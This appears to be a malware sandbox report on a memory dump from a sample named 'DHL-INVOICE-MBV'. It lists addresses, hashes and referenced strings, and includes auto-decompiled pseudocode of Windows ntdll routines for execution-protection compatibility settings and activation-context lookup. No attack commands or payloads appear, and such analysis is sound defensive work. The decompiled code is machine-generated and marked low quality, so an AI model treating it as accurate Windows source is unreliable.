0x1d7ceffa
0x1d7cefff
0x1d7cf002
0x1d7cf008
0x1d7cf00a
0x1d7cf15d
0x1d7cf164
0x1d7cf165
0x1d7cf168
0x1d7cf16b
0x1d7cf16e
0x1d7cf170
0x00000000
0x00000000
0x1d7cf176
0x1d7cf17a
0x1d7cf1c8
0x1d7cf1cf
0x1d7cf1d0
0x1d7cf1d3
0x00000000
0x1d7cf1d3
0x1d7cf17c
0x1d7cf105
0x1d7cf105
0x1d7cf108
0x1d7cf10a
0x1d7cf1b7
0x1d7cf1b7
0x1d7cf110
0x00000000
0x1d7cf110
0x1d7cf010
0x1d7cf010
0x1d7cf013
0x1d7cf0a2
0x1d7cf0a2
0x1d7cf0a6
0x1d7cf186
0x1d7cf186
0x1d7cf0ac
0x1d7cf0b0
0x1d80fe56
0x1d80fe56
0x1d7cf103
0x1d7cf103
0x00000000
0x1d7cf103
0x1d7cf0bc
0x1d7cf0c3
0x1d7cf0c4
0x1d7cf0c7
0x1d7cf0ce
0x1d80fe35
0x1d80fe35
0x1d80fe39
0x00000000
0x00000000
0x1d80fe41
0x1d80fe41
0x1d80fe42
0x1d80fe48
0x1d80fe51
0x00000000
0x1d80fe51
0x1d7cf0d4
0x1d7cf0db
0x00000000
0x00000000
0x1d7cf0e1
0x1d7cf0e5
0x1d7cf193
0x1d7cf199
0x1d7cf19b
0x00000000
0x00000000
0x1d7cf0f4
0x1d7cf0f4
0x1d7cf0f8
0x1d7cf0fa
0x1d7cf0fd
0x1d80fe1e
0x1d80fe21
0x1d80fe24
0x1d80fe27
0x1d80fe2a
0x1d80fe2d
0x1d80fe2d
0x1d7cf0fd
0x00000000
0x1d7cf0f8
0x1d7cf0eb
0x1d7cf0ee
0x1d7cf0f1
0x00000000
0x1d7cf0f1
0x1d7cf01c
0x1d7cf01f
0x1d7cf02a
0x1d7cf02d
0x1d7cf030
0x1d7cf034
0x1d7cf036
0x1d7cf039
0x1d7cf045
0x1d7cf051
0x1d7cf05a
0x1d7cf05a
0x1d7cf05d
0x1d7cf060
0x1d7cf062
0x1d80fd59
0x1d80fd5c
0x00000000
0x00000000
0x1d80fd62
0x1d80fd66
0x1d80fd72
0x1d80fd84
0x1d80fd8a
0x1d80fd8d
0x1d80fd90
0x00000000
0x1d80fd90
0x1d80fd68
0x1d80fd6c
0x00000000
0x00000000
0x00000000
0x1d7cf068
0x1d7cf068
0x1d7cf068
0x1d7cf06d
0x1d80fd98
0x1d80fda8
0x1d80fdae
0x1d80fdae
0x1d7cf073
0x1d7cf078
0x1d7cf07a
0x1d80fdbf
0x1d7cf080
0x1d7cf080
0x1d7cf080
0x1d7cf085
0x1d7cf088
0x1d80fde1
0x1d80fde4
0x1d80fde4
0x1d7cf08e
0x1d7cf095
0x1d7cf09d
0x00000000
0x1d7cf09d
0x1d7cf062
0x1d80fd29
0x1d7cf150
0x1d7cf153
0x00000000
0x00000000
0x00000000
0x1d7cf155
0x1d7cef87
0x1d7cef8a
0x1d7cf136
0x1d7cf13c
0x1d7cf13e
0x00000000
0x00000000
0x00000000
0x1d7cf13e
0x00000000
0x1d7cef8a

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2ebe03e241cf90ddb90f0507fcf249ab99583e595cc00ea75e5a3374df8d411
Instruction ID: 3222d7ea97d2352f0707cff767f8cc3b5f969e15ef4cb257222143cdedb432aa
Opcode Fuzzy Hash: f2ebe03e241cf90ddb90f0507fcf249ab99583e595cc00ea75e5a3374df8d411
Instruction Fuzzy Hash: 4BE11676D0164ADFCB25CFA9D984A9DFBF1FF48320F20852AE945A7260D730A840CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D87A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1D87A25D
RtlDebugPrintTimes.NTDLL ref: 1D87A2F1
RtlDebugPrintTimes.NTDLL ref: 1D87A314
RtlDebugPrintTimes.NTDLL ref: 1D87A340
RtlDebugPrintTimes.NTDLL ref: 1D87A415
RtlDebugPrintTimes.NTDLL ref: 1D87A468
RtlDebugPrintTimes.NTDLL ref: 1D87A487
RtlDebugPrintTimes.NTDLL ref: 1D87A4B8

Strings

HEAP: , xrefs: 1D87A206

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: c4f335a543e7c1ce6373eacf03b71a6d22be8bee80658c98ec95dd07d2a646d2
Instruction ID: 34a8bf5f564c62c24822f5070198e5405d1c805bbf02fd6916a89f01566b3bb2
Opcode Fuzzy Hash: c4f335a543e7c1ce6373eacf03b71a6d22be8bee80658c98ec95dd07d2a646d2
Instruction Fuzzy Hash: 23A17B72B182168FC709CF98C894A2BB7E5BF88754F05456DEA49DB320E771EC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D7D7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E1D7D7550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x1d89b370 ^ _t107;
				_v8 =  *0x1d89b370 ^ _t107;
				_t105 = __ecx;
				if( *0x1d896664 == 0) {
					L5:
					return E1D7E4B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E1D7AE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E1D7D7738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E1D7D763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E1D7E2B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E1D7D76ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E1D82EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E1D7E8F40( &_v548, 0, 0x214);
						_t106 =  *0x1d896664;
						_t110 = _t108 + 0x20;
						 *0x1d8991e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x1d896664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E1D7E4C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E1D82EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E1D7EA9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E1D82EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E1D7EA690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E1D82EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E1D81CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E1D82EF10();
						goto L15;
					}
					L8:
					_t56 = E1D7D7648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x1d7d7560
0x1d7d7562
0x1d7d756f
0x1d7d7571
0x1d7d75ab
0x1d7d75b9
0x1d7d75b9
0x1d7d7579
0x1d7d7583
0x1d7d758f
0x1d814443
0x1d7d7595
0x1d7d759e
0x1d7d759e
0x1d7d75a2
0x1d7d75bc
0x1d7d75c2
0x1d7d75c7
0x1d7d75c9
0x1d7d7621
0x1d7d7623
0x1d7d7624
0x1d7d75f8
0x1d7d75ff
0x1d7d7601
0x1d7d762c
0x1d7d7603
0x1d7d7609
0x1d7d7610
0x1d7d7612
0x1d7d7612
0x1d7d7612
0x1d7d7614
0x1d7d7616
0x1d7d7630
0x1d7d7633
0x1d7d7633
0x1d7d7618
0x1d7d761a
0x1d8145c9
0x1d8145c9
0x1d8145d1
0x1d8145d2
0x1d8145d4
0x1d8145d6
0x1d8145d6
0x00000000
0x1d7d761a
0x1d7d75ce
0x1d7d75d4
0x1d7d75da
0x1d7d75df
0x1d7d75e1
0x1d81444a
0x1d814450
0x00000000
0x00000000
0x1d814456
0x1d814469
0x1d814476
0x1d814486
0x1d81448b
0x1d814497
0x1d8144b9
0x1d8144bf
0x1d8144c1
0x1d8144c3
0x00000000
0x00000000
0x1d8144c9
0x1d8144cf
0x1d8144d1
0x00000000
0x00000000
0x1d8144dc
0x1d8144de
0x00000000
0x00000000
0x1d8144e6
0x1d8144ed
0x1d8144ef
0x1d8145c4
0x00000000
0x1d8145c4
0x1d8144f7
0x1d8144f8
0x1d814510
0x1d814515
0x1d814524
0x1d81452b
0x1d81452c
0x1d81452e
0x1d814556
0x1d814561
0x1d814567
0x1d814569
0x1d81456c
0x1d81456e
0x1d814574
0x1d814576
0x00000000
0x00000000
0x00000000
0x00000000
0x1d81457c
0x1d81457c
0x1d814584
0x1d814588
0x1d81458a
0x1d81458c
0x1d81458e
0x1d81458e
0x1d81459b
0x1d8145a0
0x1d8145a7
0x1d8145ac
0x1d8145ae
0x00000000
0x00000000
0x1d8145b4
0x1d8145b4
0x1d8145b7
0x1d8145b7
0x00000000
0x1d8145bf
0x1d814530
0x1d814535
0x1d814537
0x1d814539
0x00000000
0x1d81453e
0x1d7d75e7
0x1d7d75e9
0x1d7d75ee
0x1d7d75f0
0x00000000
0x00000000
0x1d7d75f2
0x00000000
0x1d7d75a4
0x1d7d75a4
0x1d7d75a4
0x00000000
0x1d7d75a4

Strings

ExecuteOptions, xrefs: 1D8144AB
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1D81454D
Execute=1, xrefs: 1D81451E
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1D814530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1D814507
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1D814460
CLIENT(ntdll): Processing section info %ws..., xrefs: 1D814592

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 41b32a37f33391c4d08c03cba488d6c8eb1715fd8a7bb50cb382a5d930f44c89
Instruction ID: 6cbceb94557d61085e53c0cd280a6b2d745f6238b4b8f22101b70b8ff7f05e3a
Opcode Fuzzy Hash: 41b32a37f33391c4d08c03cba488d6c8eb1715fd8a7bb50cb382a5d930f44c89
Instruction Fuzzy Hash: B6513D31904759BADF519A98EC85FFDB3A8EF08324F0105E9D607A7191E730AE45CB53

Uniqueness

Uniqueness Score: -1.00%

Function 1D7BA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E1D7BA170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E1D7BA600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E1D7BA760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x1d8991e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E1D7A4428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E1D7BA600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E1D82EF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E1D82EF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}

0x1d7ba178
0x1d7ba17f
0x1d7ba182
0x1d7ba18f
0x1d7ba4b4
0x00000000
0x1d8077ce
0x1d8077ce
0x00000000
0x1d8077ce
0x1d7ba195
0x1d7ba195
0x1d7ba199
0x1d7ba1a1
0x1d7ba1a9
0x1d7ba1b1
0x1d8077f3
0x1d8077f3
0x00000000
0x1d7ba1b7
0x1d7ba1b7
0x1d7ba1c0
0x00000000
0x1d7ba1c6
0x1d7ba1c6
0x1d7ba1cc
0x1d7ba5dc
0x00000000
0x1d7ba5e2
0x00000000
0x1d7ba5e2
0x1d7ba1d2
0x1d7ba1d4
0x00000000
0x1d7ba1da
0x1d7ba1da
0x1d7ba1dd
0x00000000
0x1d7ba1e3
0x1d7ba1e3
0x1d7ba1e6
0x1d7ba1fa
0x1d7ba1fd
0x1d7ba5f0
0x00000000
0x1d7ba5f6
0x1d8077fd
0x1d807802
0x1d807807
0x00000000
0x1d807807
0x1d7ba203
0x1d7ba203
0x1d7ba208
0x1d7ba20b
0x1d7ba20f
0x1d7ba216
0x1d7ba21c
0x1d7ba224
0x1d7ba228
0x1d7ba22b
0x1d7ba233
0x1d7ba23b
0x1d7ba23f
0x1d7ba243
0x1d7ba247
0x1d7ba250
0x1d7ba252
0x1d7ba255
0x00000000
0x00000000
0x1d7ba25b
0x1d7ba263
0x1d7ba26f
0x1d7ba26f
0x1d7ba277
0x1d7ba27d
0x1d7ba3ae
0x1d7ba3ae
0x1d7ba3b4
0x1d7ba3be
0x1d807823
0x1d807826
0x00000000
0x1d80782c
0x1d80782c
0x00000000
0x1d80782c
0x1d7ba3c4
0x1d7ba3c4
0x1d7ba3c9
0x00000000
0x1d7ba3c9
0x1d7ba283
0x1d7ba283
0x1d7ba288
0x00000000
0x1d7ba288
0x1d7ba265
0x1d7ba265
0x1d7ba269
0x1d7ba4bf
0x1d7ba4c2
0x1d7ba4c8
0x1d7ba4e3
0x1d80780e
0x00000000
0x1d7ba4e9
0x1d7ba4ec
0x1d807819
0x00000000
0x1d7ba4f2
0x1d7ba4f2
0x00000000
0x1d7ba4f2
0x1d7ba4ec
0x1d7ba4ca
0x1d7ba4ca
0x1d7ba4cc
0x00000000
0x1d7ba4d2
0x1d7ba4d2
0x1d7ba4d2
0x1d7ba4d7
0x1d7ba28c
0x1d7ba28e
0x1d807833
0x1d807838
0x1d807838
0x00000000
0x1d7ba294
0x1d7ba2a5
0x1d7ba2ac
0x1d7ba3d2
0x1d7ba3d9
0x00000000
0x1d7ba3e8
0x1d7ba3e8
0x1d7ba3ec
0x1d7ba3f0
0x00000000
0x1d7ba3f0
0x1d7ba2b2
0x1d7ba2b2
0x1d7ba2d2
0x1d7ba2d6
0x1d7ba2d8
0x1d7ba2da
0x1d7ba2dc
0x1d7ba2de
0x1d80783a
0x1d80783c
0x00000000
0x1d807842
0x00000000
0x1d807842
0x1d7ba2e4
0x1d7ba2e4
0x1d7ba2e4
0x1d7ba2eb
0x1d8078ed
0x1d8078ed
0x00000000
0x1d7ba2f1
0x1d7ba2f1
0x1d7ba300
0x1d7ba300
0x1d7ba300
0x1d7ba30a
0x00000000
0x00000000
0x1d7ba310
0x1d7ba325
0x1d7ba32c
0x1d7ba4f7
0x1d7ba500
0x1d7ba502
0x1d7ba505
0x1d7ba50b
0x1d7ba5a5
0x1d7ba5b8
0x1d7ba5be
0x1d7ba5c2
0x1d7ba5cb
0x1d7ba5d1
0x1d7ba5d1
0x1d7ba5cb
0x1d7ba50b
0x1d7ba523
0x1d7ba549
0x1d7ba551
0x1d7ba525
0x1d7ba53c
0x1d7ba543
0x00000000
0x00000000
0x00000000
0x00000000
0x1d7ba543
